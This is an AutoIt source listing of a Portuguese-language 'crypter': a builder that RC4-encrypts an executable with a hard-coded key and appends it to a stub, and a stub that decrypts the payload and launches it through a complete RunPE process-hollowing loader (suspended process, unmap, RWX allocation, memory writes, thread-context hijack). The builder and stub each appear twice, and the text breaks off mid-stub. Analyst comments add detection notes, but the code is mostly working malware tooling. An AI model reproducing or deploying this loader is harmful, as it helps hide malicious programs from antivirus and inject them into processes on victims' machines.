#cs ----------------------------------------------------------------------------
AutoIt Version: 3.3.8.1
Author: CHARLLES
Contact: [email protected]
Script Function: CRYPT FILE
Template AutoIt script.
Initialized Day 28/08/2016
Time Of Day 20:10
#ce ----------------------------------------------------------------------------
#include <ButtonConstants.au3>
#include <EditConstants.au3>
#include <GUIConstantsEx.au3>
#include <StaticConstants.au3>
#include <WindowsConstants.au3>
#Region ### START Koda GUI section ### Form=
; Builder front-end. Shows a tray tip ("Bem-Vindo" = welcome) carrying the local
; computer name, then a small window with one path field and two buttons.
TrayTip("Bem-Vindo", @ComputerName, 17)
$Form1 = GUICreate("Crypter in AU3", 474, 102, 192, 124)
GUISetBkColor(0x000000)
$Group1 = GUICtrlCreateGroup("", 8, 0, 457, 97)
; $Input1 holds the path of the executable to be packed; Encryptar() reads it back.
$Input1 = GUICtrlCreateInput("", 16, 16, 401, 21, BitOR($ES_CENTER,$ES_AUTOHSCROLL))
; $Button1 (".....") is dispatched to Abrir() and $Button2 to Encryptar() by the
; message loop at the end of the builder script.
$Button1 = GUICtrlCreateButton(".....", 424, 16, 33, 25, $WS_GROUP)
GUICtrlSetBkColor(-1, 0xFFFFFF)
$Button2 = GUICtrlCreateButton("Encryptar", 104, 48, 241, 25, $WS_GROUP)
GUICtrlCreateGroup("", -99, -99, 1, 1)
GUISetState(@SW_SHOW)
; Hotkey handler: ends the script with exit code 0.
Func Terminate()
Exit 0
EndFunc ;==>Terminate
; F2 is registered as a hotkey that calls Terminate().
HotKeySet("{F2}", "Terminate")
#EndRegion ### END Koda GUI section ###
; Browse handler ("abrir" = open): shows a file picker that starts in the desktop
; folder with the filter "Executáveis(*.exe)" and writes the dialog's return value
; into $Input1. The result is not checked, so a cancelled dialog still overwrites
; the field with whatever FileOpenDialog returned.
Func Abrir()
GUICtrlSetData($Input1, FileOpenDialog("", @DesktopDir, "Executáveis(*.exe)"))
EndFunc
; Build step: produces an output file laid out as
;   [ bytes of Stub.exe ][ ASCII "HUIF" ][ transformed bytes of the chosen file ]
; i.e. the input executable is carried as appended data behind the stub.
; No return value of FileOpen / FileRead / FileSaveDialog is checked anywhere here.
;
; Analyst notes:
; - The key "IHFSDIHIOHFSIHOFISJH" and the marker "HUIF" are constants that the stub
;   on this page uses as well, so they are stable strings for signatures on files
;   produced by this builder.
; - Because the key is fixed, the appended blob of such a file can be recovered
;   offline (assuming the transform is RC4, as the author's comment on the helper says).
Func Encryptar()
; Nothing selected -> do nothing.
If GuiCtrlRead($Input1) = "" Then Return
; Mode 16 = binary read. Stub.exe is expected next to this script.
$Stub = FileOpen(@ScriptDir & "\Stub.exe", 16)
$File = FileOpen(GuiCtrlRead($Input1), 16)
$s = FileRead($Stub)
$f = FileRead($File)
; Transform the whole input file with the hard-coded key.
$f = RRgSATclojwnMrIKpuHHhbsTAXOtcBRdBITRT($f, "IHFSDIHIOHFSIHOFISJH")
; Mode 18 = 2 (write, erase existing) + 16 (binary). ".exe" is appended
; unconditionally to whatever the save dialog returns, including an empty result.
$abri = FileOpen(FileSaveDialog("Salvar Como...", @DesktopDir, "Executáveis(*.exe)") & ".exe", 18)
; Stub first, then the 4-byte marker the stub searches for, then the blob.
FileWrite($abri, $s)
FileWrite($abri, StringToBinary("HUIF"))
FileWrite($abri, $f)
FileClose($Stub)
fileclose($File)
Fileclose($abri)
EndFunc
; Exits the script ("sair" = exit). Not called anywhere in the visible source.
Func sair()
Exit
EndFunc
; code below = RC4
; Keyed transform of a binary blob, carried out by native code held in a string.
; The author's comment just above this function labels it RC4. The code literal on
; the first Local line was stripped from this copy of the page (placeholder text,
; string left unterminated), so the algorithm cannot be confirmed from here.
;   $YXYETAWVTNXDTCRUFWNZ4 - data to transform (binary)
;   $HDAUJBVSHSJMUTFXEPQG0 - key string
; Returns the contents of the data buffer after the native call.
;
; Detection note: user32!CallWindowProc being handed a pointer into a script-built
; data buffer instead of a real window procedure is the execution primitive here.
Func RRgSATclojwnMrIKpuHHhbsTAXOtcBRdBITRT($YXYETAWVTNXDTCRUFWNZ4, $HDAUJBVSHSJMUTFXEPQG0)
Local $EYTKUDBRKEFDDZLAKXKN4 = "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
; Copy the code bytes into a byte-array struct so a raw pointer to them exists.
Local $JIRVQRVFYRCZEBBVLKLC4 = DllStructCreate("byte[" & BinaryLen($EYTKUDBRKEFDDZLAKXKN4) & "]")
DllStructSetData($JIRVQRVFYRCZEBBVLKLC4, 1, $EYTKUDBRKEFDDZLAKXKN4)
; Copy the input into a second buffer; the result is read back from this same
; buffer below, so the native routine presumably works in place.
Local $WAMSDHOGJRVMNPVKQGYM6 = DllStructCreate("byte[" & BinaryLen($YXYETAWVTNXDTCRUFWNZ4) & "]")
DllStructSetData($WAMSDHOGJRVMNPVKQGYM6, 1, $YXYETAWVTNXDTCRUFWNZ4)
; CallWindowProc serves only as a trampoline: its first argument is the code
; buffer, the other four are (data pointer, data length, key string, 0).
DllCall("user32.dll", "none", "CallWindowProc", "ptr", DllStructGetPtr($JIRVQRVFYRCZEBBVLKLC4), "ptr", DllStructGetPtr($WAMSDHOGJRVMNPVKQGYM6), "int", BinaryLen($YXYETAWVTNXDTCRUFWNZ4), "str", $HDAUJBVSHSJMUTFXEPQG0, "int", 0)
Local $ZTAIPGIFAXOREGLKYMWO2 = DllStructGetData($WAMSDHOGJRVMNPVKQGYM6, 1)
; Assigning 0 releases both structs.
$WAMSDHOGJRVMNPVKQGYM6 = 0
$JIRVQRVFYRCZEBBVLKLC4 = 0
Return $ZTAIPGIFAXOREGLKYMWO2
EndFunc
; GUI message loop of the builder: polls for an event and dispatches it.
While 1
$nMsg = GUIGetMsg()
Switch $nMsg
; Window closed -> end the script.
Case $GUI_EVENT_CLOSE
Exit
; Browse button -> file picker.
case $Button1
Abrir()
; "Encryptar" button -> build the output file.
case $Button2
Encryptar()
EndSwitch
WEnd
;------------------------------------------------------------------------------
#cs ----------------------------------------------------------------------------
AutoIt Version: 3.3.8.1
Author: CHARLLES
Contact: [email protected]
Script Function: CRYPT FILE
Template AutoIt script.
Initialized Day 28/08/2016
Time Of Day 20:10
#ce ----------------------------------------------------------------------------
#include <ButtonConstants.au3>
#include <EditConstants.au3>
#include <GUIConstantsEx.au3>
#include <StaticConstants.au3>
#include <WindowsConstants.au3>
#Region ### START Koda GUI section ### Form=
; Builder front-end (second copy of the listing on this page). Shows a tray tip
; with the local computer name, then a small window with one path field and two buttons.
TrayTip("Bem-Vindo", @ComputerName, 17)
$Form1 = GUICreate("Crypter in AU3", 474, 102, 192, 124)
GUISetBkColor(0x000000)
$Group1 = GUICtrlCreateGroup("", 8, 0, 457, 97)
; $Input1 holds the path of the executable to be packed; Encryptar() reads it back.
$Input1 = GUICtrlCreateInput("", 16, 16, 401, 21, BitOR($ES_CENTER,$ES_AUTOHSCROLL))
; $Button1 (".....") is dispatched to Abrir() and $Button2 to Encryptar() by the
; message loop at the end of the builder script.
$Button1 = GUICtrlCreateButton(".....", 424, 16, 33, 25, $WS_GROUP)
GUICtrlSetBkColor(-1, 0xFFFFFF)
$Button2 = GUICtrlCreateButton("Encryptar", 104, 48, 241, 25, $WS_GROUP)
GUICtrlCreateGroup("", -99, -99, 1, 1)
GUISetState(@SW_SHOW)
; Hotkey handler: ends the script with exit code 0.
Func Terminate()
Exit 0
EndFunc ;==>Terminate
; F2 is registered as a hotkey that calls Terminate().
HotKeySet("{F2}", "Terminate")
#EndRegion ### END Koda GUI section ###
; Browse handler ("abrir" = open): shows a file picker that starts in the desktop
; folder and writes the dialog's return value into $Input1 without checking it.
Func Abrir()
GUICtrlSetData($Input1, FileOpenDialog("", @DesktopDir, "Executáveis(*.exe)"))
EndFunc
; Build step: produces an output file laid out as
;   [ bytes of Stub.exe ][ ASCII "HUIF" ][ transformed bytes of the chosen file ]
; No return value of FileOpen / FileRead / FileSaveDialog is checked.
; Analyst note: the key "IHFSDIHIOHFSIHOFISJH" and the marker "HUIF" are constants
; also used by the stub on this page, which makes them stable signature strings and
; lets the appended blob be recovered offline (assuming the transform is RC4, as the
; author's comment on the helper says).
Func Encryptar()
; Nothing selected -> do nothing.
If GuiCtrlRead($Input1) = "" Then Return
; Mode 16 = binary read. Stub.exe is expected next to this script.
$Stub = FileOpen(@ScriptDir & "\Stub.exe", 16)
$File = FileOpen(GuiCtrlRead($Input1), 16)
$s = FileRead($Stub)
$f = FileRead($File)
; Transform the whole input file with the hard-coded key.
$f = RRgSATclojwnMrIKpuHHhbsTAXOtcBRdBITRT($f, "IHFSDIHIOHFSIHOFISJH")
; Mode 18 = 2 (write, erase existing) + 16 (binary); ".exe" is always appended.
$abri = FileOpen(FileSaveDialog("Salvar Como...", @DesktopDir, "Executáveis(*.exe)") & ".exe", 18)
; Stub first, then the 4-byte marker the stub searches for, then the blob.
FileWrite($abri, $s)
FileWrite($abri, StringToBinary("HUIF"))
FileWrite($abri, $f)
FileClose($Stub)
fileclose($File)
Fileclose($abri)
EndFunc
; Exits the script ("sair" = exit). Not called anywhere in the visible source.
Func sair()
Exit
EndFunc
; code below = RC4
; Keyed transform of a binary blob, carried out by native code held in a string.
; The author's comment just above this function labels it RC4. The code literal on
; the first Local line was stripped from this copy of the page (placeholder text,
; string left unterminated), so the algorithm cannot be confirmed from here.
;   $YXYETAWVTNXDTCRUFWNZ4 - data to transform (binary)
;   $HDAUJBVSHSJMUTFXEPQG0 - key string
; Returns the contents of the data buffer after the native call.
Func RRgSATclojwnMrIKpuHHhbsTAXOtcBRdBITRT($YXYETAWVTNXDTCRUFWNZ4, $HDAUJBVSHSJMUTFXEPQG0)
Local $EYTKUDBRKEFDDZLAKXKN4 = "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
; Copy the code bytes into a byte-array struct so a raw pointer to them exists.
Local $JIRVQRVFYRCZEBBVLKLC4 = DllStructCreate("byte[" & BinaryLen($EYTKUDBRKEFDDZLAKXKN4) & "]")
DllStructSetData($JIRVQRVFYRCZEBBVLKLC4, 1, $EYTKUDBRKEFDDZLAKXKN4)
; Copy the input into a second buffer; the result is read back from it below.
Local $WAMSDHOGJRVMNPVKQGYM6 = DllStructCreate("byte[" & BinaryLen($YXYETAWVTNXDTCRUFWNZ4) & "]")
DllStructSetData($WAMSDHOGJRVMNPVKQGYM6, 1, $YXYETAWVTNXDTCRUFWNZ4)
; CallWindowProc serves only as a trampoline: its first argument is the code
; buffer, the other four are (data pointer, data length, key string, 0).
; Detection note: a CallWindowProc target that lies in a data buffer rather than
; in a module's code is the execution primitive to look for.
DllCall("user32.dll", "none", "CallWindowProc", "ptr", DllStructGetPtr($JIRVQRVFYRCZEBBVLKLC4), "ptr", DllStructGetPtr($WAMSDHOGJRVMNPVKQGYM6), "int", BinaryLen($YXYETAWVTNXDTCRUFWNZ4), "str", $HDAUJBVSHSJMUTFXEPQG0, "int", 0)
Local $ZTAIPGIFAXOREGLKYMWO2 = DllStructGetData($WAMSDHOGJRVMNPVKQGYM6, 1)
; Assigning 0 releases both structs.
$WAMSDHOGJRVMNPVKQGYM6 = 0
$JIRVQRVFYRCZEBBVLKLC4 = 0
Return $ZTAIPGIFAXOREGLKYMWO2
EndFunc
; GUI message loop of the builder: polls for an event and dispatches it.
While 1
$nMsg = GUIGetMsg()
Switch $nMsg
; Window closed -> end the script.
Case $GUI_EVENT_CLOSE
Exit
; Browse button -> file picker.
case $Button1
Abrir()
; "Encryptar" button -> build the output file.
case $Button2
Encryptar()
EndSwitch
WEnd
;------------------------------------------------------------------------------
; Stub
; Stub entry point. Runs without a tray icon, idles for 5 seconds, then reads its
; own file from disk, takes the data behind the "HUIF" marker, reverses the keyed
; transform with the same hard-coded key the builder used, and passes the result to
; the in-memory loader defined further down.
; Analyst notes: the fixed 5 s delay precedes all other activity; the process opens
; its own image file for reading; marker and key are literal strings in the script.
#NoTrayIcon
sleep(5000)
; Mode 0 = read. @ScriptFullPath is the running script/executable itself.
$NGSDCXGZCEIXKJULDQPG3 = FileOpen(@ScriptFullPath, 0)
$HOPMPNVNFBLJMAEBPWGH7 = FileRead($NGSDCXGZCEIXKJULDQPG3)
; Keep everything after the first occurrence of "HUIF".
$HOPMPNVNFBLJMAEBPWGH7 = StringMid($HOPMPNVNFBLJMAEBPWGH7, StringInStr($HOPMPNVNFBLJMAEBPWGH7, "HUIF") + StringLen("HUIF"))
$HOPMPNVNFBLJMAEBPWGH7 = RRgSATclojwnMrIKpuHHhbsTAXOtcBRdBITRT($HOPMPNVNFBLJMAEBPWGH7, "IHFSDIHIOHFSIHOFISJH")
; The loader's return value and @error are ignored.
FBTxWthxSleyxEIZwoaSrtztmANOBstRYvrNc($HOPMPNVNFBLJMAEBPWGH7)
; Keyed transform of a binary blob, carried out by native code held in a string;
; same function as in the builder part of this page, where a comment labels it RC4.
; The code literal on the first Local line was stripped from this copy of the page
; (placeholder text, string left unterminated), so that cannot be confirmed here.
;   $YXYETAWVTNXDTCRUFWNZ4 - data to transform (binary)
;   $HDAUJBVSHSJMUTFXEPQG0 - key string
; Returns the contents of the data buffer after the native call.
Func RRgSATclojwnMrIKpuHHhbsTAXOtcBRdBITRT($YXYETAWVTNXDTCRUFWNZ4, $HDAUJBVSHSJMUTFXEPQG0)
Local $EYTKUDBRKEFDDZLAKXKN4 = "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
; Copy the code bytes into a byte-array struct so a raw pointer to them exists.
Local $JIRVQRVFYRCZEBBVLKLC4 = DllStructCreate("byte[" & BinaryLen($EYTKUDBRKEFDDZLAKXKN4) & "]")
DllStructSetData($JIRVQRVFYRCZEBBVLKLC4, 1, $EYTKUDBRKEFDDZLAKXKN4)
; Copy the input into a second buffer; the result is read back from it below.
Local $WAMSDHOGJRVMNPVKQGYM6 = DllStructCreate("byte[" & BinaryLen($YXYETAWVTNXDTCRUFWNZ4) & "]")
DllStructSetData($WAMSDHOGJRVMNPVKQGYM6, 1, $YXYETAWVTNXDTCRUFWNZ4)
; CallWindowProc serves only as a trampoline: its first argument is the code
; buffer, the other four are (data pointer, data length, key string, 0).
; Detection note: a CallWindowProc target that lies in a data buffer rather than
; in a module's code is the execution primitive to look for.
DllCall("user32.dll", "none", "CallWindowProc", "ptr", DllStructGetPtr($JIRVQRVFYRCZEBBVLKLC4), "ptr", DllStructGetPtr($WAMSDHOGJRVMNPVKQGYM6), "int", BinaryLen($YXYETAWVTNXDTCRUFWNZ4), "str", $HDAUJBVSHSJMUTFXEPQG0, "int", 0)
Local $ZTAIPGIFAXOREGLKYMWO2 = DllStructGetData($WAMSDHOGJRVMNPVKQGYM6, 1)
; Assigning 0 releases both structs.
$WAMSDHOGJRVMNPVKQGYM6 = 0
$JIRVQRVFYRCZEBBVLKLC4 = 0
Return $ZTAIPGIFAXOREGLKYMWO2
EndFunc
; In-memory loader of the "RunPE" / process-hollowing kind (MITRE ATT&CK T1055.012).
; It starts a second, suspended instance of the current interpreter executable,
; replaces the memory at the payload's image base with the PE passed in, points the
; suspended thread at the payload's entry point and resumes it.
;   $DBMQXORDDWSNFPUYSUAV9 - complete PE file image (binary)
; Returns the child's process id on success. On failure returns 0 with @error set to
; 1..11 naming the failed step (for 9, @extended is the 1-based section index); from
; step 2 onwards the child is terminated first.
; 32-bit only: the CONTEXT layout is the x86 one and the PE32 magic is required.
; Header offsets and sizes taken from the payload are not checked against the
; buffer length, and the process/thread handles are never closed in this function.
;
; Telemetry this sequence produces, in order: CreateProcessW with CREATE_SUSPENDED on
; the caller's own image, NtUnmapViewOfSection, VirtualAllocEx with RWX protection,
; repeated WriteProcessMemory, SetThreadContext, ResumeThread - all against the child.
Func FBTxWthxSleyxEIZwoaSrtztmANOBstRYvrNc($DBMQXORDDWSNFPUYSUAV9)
; Copy the payload into a local byte buffer; $RDPZ... is a cursor that walks its headers.
Local $SBIKXSGRAVLUWIPAXAAG8 = Binary($DBMQXORDDWSNFPUYSUAV9)
Local $FQNMUYXHWPFJMQPPSYLW3 = DllStructCreate("byte[" & BinaryLen($SBIKXSGRAVLUWIPAXAAG8) & "]")
DllStructSetData($FQNMUYXHWPFJMQPPSYLW3, 1, $SBIKXSGRAVLUWIPAXAAG8)
Local $RDPZAWDJPCVWFHXSHJUJ3 = DllStructGetPtr($FQNMUYXHWPFJMQPPSYLW3)
; STARTUPINFO-shaped struct, left zeroed (cbSize is never set).
Local $AQYZPWFUNEZJYVRRELBM1 = DllStructCreate("dword cbSize;" & "ptr Reserved;" & "ptr Desktop;" & "ptr Title;" & "dword X;" & "dword Y;" & "dword XSize;" & "dword YSize;" & "dword XCountChars;" & "dword YCountChars;" & "dword FillAttribute;" & "dword Flags;" & "ushort ShowWindow;" & "ushort Reserved2;" & "ptr Reserved2;" & "ptr hStdInput;" & "ptr hStdOutput;" & "ptr hStdError")
; PROCESS_INFORMATION-shaped struct that receives the child's handles and ids.
Local $KTBXIKXYHPHPTXXBXBVK0 = DllStructCreate("ptr Process;" & "ptr Thread;" & "dword ProcessId;" & "dword ThreadId")
; Step 1: spawn @AutoItExe (the running interpreter/compiled script) with creation
; flags 4 = CREATE_SUSPENDED, so its main thread has not executed yet.
Local $FOADNRFSFHWOVGQYKWWB0 = DllCall("kernel32.dll", "int", "CreateProcessW", "wstr", @AutoItExe, "ptr", 0, "ptr", 0, "ptr", 0, "int", 0, "dword", 4, "ptr", 0, "ptr", 0, "ptr", DllStructGetPtr($AQYZPWFUNEZJYVRRELBM1), "ptr", DllStructGetPtr($KTBXIKXYHPHPTXXBXBVK0))
If @error Or Not $FOADNRFSFHWOVGQYKWWB0[0] Then
Return SetError(1, 0, 0)
EndIf
Local $QAHCMXTRTDWHSBHKJVWN3 = DllStructGetData($KTBXIKXYHPHPTXXBXBVK0, "Process")
Local $DVZXVGMITVHCYPEAORRM3 = DllStructGetData($KTBXIKXYHPHPTXXBXBVK0, "Thread")
; Step 2: fetch the suspended thread's registers. The layout is the x86 CONTEXT;
; 65538 = 0x10002 = CONTEXT_i386 | CONTEXT_INTEGER (general-purpose registers).
Local $DCSAQWEGABYFFEERANAQ6 = DllStructCreate("dword ContextFlags;" & "dword Dr0;" & "dword Dr1;" & "dword Dr2;" & "dword Dr3;" & "dword Dr6;" & "dword Dr7;" & "dword ControlWord;" & "dword StatusWord;" & "dword TagWord;" & "dword ErrorOffset;" & "dword ErrorSelector;" & "dword DataOffset;" & "dword DataSelector;" & "byte RegisterArea[80];" & "dword Cr0NpxState;" & "dword SegGs;" & "dword SegFs;" & "dword SegEs;" & "dword SegDs;" & "dword Edi;" & "dword Esi;" & "dword Ebx;" & "dword Edx;" & "dword Ecx;" & "dword Eax;" & "dword Ebp;" & "dword Eip;" & "dword SegCs;" & "dword EFlags;" & "dword Esp;" & "dword SegS")
DllStructSetData($DCSAQWEGABYFFEERANAQ6, "ContextFlags", 65538)
$FOADNRFSFHWOVGQYKWWB0 = DllCall( "kernel32.dll", "int", "GetThreadContext", "ptr", $DVZXVGMITVHCYPEAORRM3, "ptr", DllStructGetPtr($DCSAQWEGABYFFEERANAQ6))
If @error Or Not $FOADNRFSFHWOVGQYKWWB0[0] Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $QAHCMXTRTDWHSBHKJVWN3, "dword", 0)
Return SetError(2, 0, 0)
EndIf
; Step 3: overlay an IMAGE_DOS_HEADER on the payload. The cursor is advanced by
; AddressOfNewExeHeader (e_lfanew) before the "MZ" magic is verified.
Local $UHUUUYDHZONNOYAAVAPL3 = DllStructCreate("char Magic[2];" & "ushort BytesOnLastPage;" & "ushort Pages;" & "ushort Relocations;" & "ushort SizeofHeader;" & "ushort MinimumExtra;" & "ushort MaximumExtra;" & "ushort SS;" & "ushort SP;" & "ushort Checksum;" & "ushort IP;" & "ushort CS;" & "ushort Relocation;" & "ushort Overlay;" & "char Reserved[8];" & "ushort OEMIdentifier;" & "ushort OEMInformation;" & "char Reserved2[20];" & "dword AddressOfNewExeHeader", $RDPZAWDJPCVWFHXSHJUJ3)
$RDPZAWDJPCVWFHXSHJUJ3 += DllStructGetData($UHUUUYDHZONNOYAAVAPL3, "AddressOfNewExeHeader")
Local $FUXEKOQCSLVFFYXRDWQJ6 = DllStructGetData($UHUUUYDHZONNOYAAVAPL3, "Magic")
If Not ($FUXEKOQCSLVFFYXRDWQJ6 == "MZ") Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $QAHCMXTRTDWHSBHKJVWN3, "dword", 0)
Return SetError(3, 0, 0)
EndIf
; Step 4: PE signature; 17744 = 0x00004550 = "PE\0\0".
Local $CQJQRNZBEGRROZTQKLYH3 = DllStructCreate("dword Signature", $RDPZAWDJPCVWFHXSHJUJ3)
$RDPZAWDJPCVWFHXSHJUJ3 += 4
If DllStructGetData($CQJQRNZBEGRROZTQKLYH3, "Signature") <> 17744 Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $QAHCMXTRTDWHSBHKJVWN3, "dword", 0)
Return SetError(4, 0, 0)
EndIf
; IMAGE_FILE_HEADER (20 bytes); only NumberOfSections is used.
Local $UGSSFCZLMKKQKJKHHKMV8 = DllStructCreate("ushort Machine;" & "ushort NumberOfSections;" & "dword TimeDateStamp;" & "dword PointerToSymbolTable;" & "dword NumberOfSymbols;" & "ushort SizeOfOptionalHeader;" & "ushort Characteristics", $RDPZAWDJPCVWFHXSHJUJ3)
Local $LSUMNEDTUHGGSAFJWXBG6 = DllStructGetData($UGSSFCZLMKKQKJKHHKMV8, "NumberOfSections")
$RDPZAWDJPCVWFHXSHJUJ3 += 20
; Step 5: fixed part of the 32-bit optional header (96 bytes); Magic must be
; 267 = 0x10B (PE32), so a PE32+ payload is rejected with error 5.
Local $GCFXTWPIAEDVZDQPLTOY3 = DllStructCreate("ushort Magic;" & "ubyte MajorLinkerVersion;" & "ubyte MinorLinkerVersion;" & "dword SizeOfCode;" & "dword SizeOfInitializedData;" & "dword SizeOfUninitializedData;" & "dword AddressOfEntryPoint;" & "dword BaseOfCode;" & "dword BaseOfData;" & "dword ImageBase;" & "dword SectionAlignment;" & "dword FileAlignment;" & "ushort MajorOperatingSystemVersion;" & "ushort MinorOperatingSystemVersion;" & "ushort MajorImageVersion;" & "ushort MinorImageVersion;" & "ushort MajorSubsystemVersion;" & "ushort MinorSubsystemVersion;" & "dword Win32VersionValue;" & "dword SizeOfImage;" & "dword SizeOfHeaders;" & "dword CheckSum;" & "ushort Subsystem;" & "ushort DllCharacteristics;" & "dword SizeOfStackReserve;" & "dword SizeOfStackCommit;" & "dword SizeOfHeapReserve;" & "dword SizeOfHeapCommit;" & "dword LoaderFlags;" & "dword NumberOfRvaAndSizes", $RDPZAWDJPCVWFHXSHJUJ3)
$RDPZAWDJPCVWFHXSHJUJ3 += 96
Local $FIJIRSNJPLAJOIVBCMHE4PQDCEROSGAHRRBONTVS0 = DllStructGetData($GCFXTWPIAEDVZDQPLTOY3, "Magic")
If $FIJIRSNJPLAJOIVBCMHE4PQDCEROSGAHRRBONTVS0 <> 267 Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $QAHCMXTRTDWHSBHKJVWN3, "dword", 0)
Return SetError(5, 0, 0)
EndIf
Local $BMRGXVFQWVPUONGXQEIV8 = DllStructGetData($GCFXTWPIAEDVZDQPLTOY3, "AddressOfEntryPoint")
; Skip 128 bytes (16 data-directory entries of 8 bytes) without reading them; the
; cursor now sits on the first section header.
$RDPZAWDJPCVWFHXSHJUJ3 += 128
Local $ETAMFTKFHXEATYABLIDV1 = DllStructGetData($GCFXTWPIAEDVZDQPLTOY3, "ImageBase")
Local $GVMQNZZNCJVDAJCALXYR6 = DllStructGetData($GCFXTWPIAEDVZDQPLTOY3, "SizeOfImage")
; Step 6: unmap whatever the child has mapped at the payload's preferred image
; base. The call returns an NTSTATUS, so any non-zero value is treated as failure.
$FOADNRFSFHWOVGQYKWWB0 = DllCall("ntdll.dll", "int", "NtUnmapViewOfSection", "ptr", $QAHCMXTRTDWHSBHKJVWN3, "ptr", $ETAMFTKFHXEATYABLIDV1)
If @error Or $FOADNRFSFHWOVGQYKWWB0[0] Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $QAHCMXTRTDWHSBHKJVWN3, "dword", 0)
Return SetError(6, 0, 0)
EndIf
; Step 7: allocate SizeOfImage bytes in the child at that same address.
; 12288 = 0x3000 = MEM_COMMIT | MEM_RESERVE; 64 = 0x40 = PAGE_EXECUTE_READWRITE.
; A committed RWX region the size of an image in a freshly created child is a
; strong memory-scanning indicator.
$FOADNRFSFHWOVGQYKWWB0 = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", "ptr", $QAHCMXTRTDWHSBHKJVWN3, "ptr", $ETAMFTKFHXEATYABLIDV1, "dword", $GVMQNZZNCJVDAJCALXYR6, "dword", 12288, "dword", 64)
If @error Or Not $FOADNRFSFHWOVGQYKWWB0[0] Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $QAHCMXTRTDWHSBHKJVWN3, "dword", 0)
Return SetError(7, 0, 0)
EndIf
Local $RZVLCLCLBTZXORYFDDJP9 = $FOADNRFSFHWOVGQYKWWB0[0]
; Step 8: copy the first SizeOfHeaders bytes of the payload to the new region.
Local $SSCRUUOGKDHRXWJHLNVJ2 = DllStructGetPtr($UHUUUYDHZONNOYAAVAPL3)
Local $DQKEROXCGHKVJHIFPHVL4 = DllStructGetData($GCFXTWPIAEDVZDQPLTOY3, "SizeOfHeaders")
$FOADNRFSFHWOVGQYKWWB0 = DllCall("kernel32.dll", "int", "WriteProcessMemory", "ptr", $QAHCMXTRTDWHSBHKJVWN3, "ptr", $RZVLCLCLBTZXORYFDDJP9, "ptr", $SSCRUUOGKDHRXWJHLNVJ2, "dword", $DQKEROXCGHKVJHIFPHVL4, "dword*", 0)
If @error Or Not $FOADNRFSFHWOVGQYKWWB0[0] Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $QAHCMXTRTDWHSBHKJVWN3, "dword", 0)
Return SetError(8, 0, 0)
EndIf
Local $RJATWTKKNFETRTMFBJIO1
Local $KINPUJGTLNNGEYNXTNBY7, $EXJIJMOAEYYEQPBVEOZN0
Local $VHTUIZBBZGABQHZDVZOL7
; Step 9: walk the section table (40-byte IMAGE_SECTION_HEADER entries) and copy
; each section that has raw data from file offset PointerToRawData to
; base + VirtualAddress in the child.
For $FIJIRSNJPLAJOIVBCMHE4 = 1 To $LSUMNEDTUHGGSAFJWXBG6
$RJATWTKKNFETRTMFBJIO1 = DllStructCreate("char Name[8];" & "dword UnionOfVirtualSizeAndPhysicalAddress;" & "dword VirtualAddress;" & "dword SizeOfRawData;" & "dword PointerToRawData;" & "dword PointerToRelocations;" & "dword PointerToLinenumbers;" & "ushort NumberOfRelocations;" & "ushort NumberOfLinenumbers;" & "dword Characteristics", $RDPZAWDJPCVWFHXSHJUJ3)
$KINPUJGTLNNGEYNXTNBY7 = DllStructGetData($RJATWTKKNFETRTMFBJIO1, "SizeOfRawData")
$EXJIJMOAEYYEQPBVEOZN0 = DllStructGetPtr($UHUUUYDHZONNOYAAVAPL3) + DllStructGetData($RJATWTKKNFETRTMFBJIO1, "PointerToRawData")
$VHTUIZBBZGABQHZDVZOL7 = DllStructGetData($RJATWTKKNFETRTMFBJIO1, "VirtualAddress")
If $KINPUJGTLNNGEYNXTNBY7 Then
$FOADNRFSFHWOVGQYKWWB0 = DllCall("kernel32.dll", "int", "WriteProcessMemory", "ptr", $QAHCMXTRTDWHSBHKJVWN3, "ptr", $RZVLCLCLBTZXORYFDDJP9 + $VHTUIZBBZGABQHZDVZOL7, "ptr", $EXJIJMOAEYYEQPBVEOZN0, "dword", $KINPUJGTLNNGEYNXTNBY7, "dword*", 0)
If @error Or Not $FOADNRFSFHWOVGQYKWWB0[0] Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $QAHCMXTRTDWHSBHKJVWN3, "dword", 0)
Return SetError(9, $FIJIRSNJPLAJOIVBCMHE4, 0)
EndIf
EndIf
$RDPZAWDJPCVWFHXSHJUJ3 += 40
Next
; Step 10: put base + AddressOfEntryPoint into Eax of the saved context and write
; the context back (on x86 the initial thread of a suspended process carries its
; start address in Eax).
DllStructSetData($DCSAQWEGABYFFEERANAQ6, "Eax", $RZVLCLCLBTZXORYFDDJP9 + $BMRGXVFQWVPUONGXQEIV8)
$FOADNRFSFHWOVGQYKWWB0 = DllCall("kernel32.dll", "int", "SetThreadContext", "ptr", $DVZXVGMITVHCYPEAORRM3, "ptr", DllStructGetPtr($DCSAQWEGABYFFEERANAQ6))
If @error Or Not $FOADNRFSFHWOVGQYKWWB0[0] Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $QAHCMXTRTDWHSBHKJVWN3, "dword", 0)
Return SetError(10, 0, 0)
EndIf
; Step 11: let the thread run; ResumeThread reports failure as -1.
$FOADNRFSFHWOVGQYKWWB0 = DllCall("kernel32.dll", "int", "ResumeThread", "ptr", $DVZXVGMITVHCYPEAORRM3)
If @error Or $FOADNRFSFHWOVGQYKWWB0[0] = -1 Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $QAHCMXTRTDWHSBHKJVWN3, "dword", 0)
Return SetError(11, 0, 0)
EndIf
Return DllStructGetData($KTBXIKXYHPHPTXXBXBVK0, "ProcessId")
EndFunc
; Stub entry point (second copy of the stub listing on this page). Idles for
; 5 seconds, reads its own file from disk, takes the data behind the "HUIF" marker,
; reverses the keyed transform with the hard-coded key and passes the result to the
; in-memory loader defined below.
sleep(5000)
; Mode 0 = read. @ScriptFullPath is the running script/executable itself.
$NGSDCXGZCEIXKJULDQPG3 = FileOpen(@ScriptFullPath, 0)
$HOPMPNVNFBLJMAEBPWGH7 = FileRead($NGSDCXGZCEIXKJULDQPG3)
; Keep everything after the first occurrence of "HUIF".
